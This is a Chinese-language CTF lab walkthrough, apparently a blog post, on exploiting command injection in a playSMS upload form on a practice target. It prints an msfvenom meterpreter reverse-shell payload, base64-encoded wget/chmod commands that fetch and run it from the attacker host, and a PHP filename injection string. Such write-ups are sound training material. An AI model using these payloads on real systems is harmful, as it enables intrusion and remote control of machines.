CTF—攻防练习之HTTP—命令注入

主机:192.168.32.152  

靶机:192.168.32.167

首先nmap,nikto -host,dirb 探测
robots.txt目录下

在/nothing目录中,查看源码发现pass

在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开
然后发现mp3文件其实是text文本,cat打开

发现一段文字还有个url,打开url,用户:touhid,密码尝试出为diana

 

 进入了页面

然后我们就看一看当前cms有没有已知的可利用漏洞,searchsploit playSMS

该漏洞目录是  /usr/share/exploitdb/exploits/php/webapps/42003.txt cat下,cat下该漏洞查看该漏洞描述

大致意思就是说存在一个上传点,但文件名要改成另一种格式,就可执行和上传文件相关的代码
目录在app=main&inc=core_welcome,打开确实有上传点,上传csv文件的点

 

 用bp上传抓包改文件名测试下,确实存在命令注入

那我们就可以制作并上传一个反弹shell
shell为: linux/x86/meterpreter/reverse_tcp
msfvenom -p生成

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 elf> /var/www/html/s
重定向到apache服务器,通过执行下载命令,再修改权限
再用msfconsole监听即可

首先开启apache服务器:
survice apache2 start     开启
survice apache2 status  查看状态

再利用命令注入漏洞上传,使用命令注入漏洞时,我们可以先用base64转码绕过防火墙
echo 'wget http://192.168.32.152/s -O /tmp/a' | base64
echo 'chmod 777 /tmp/a' | base64
echo '/tmp/a' | base64

再在bp 中用命令  "<?php system(base64_decode('XXXXXXXX')); dia();?>.php"
最终完成三个命令上传拿到反弹shell

posted @ 2019-06-21 21:07  Wings_shadow  阅读(3077)  评论(0编辑  收藏  举报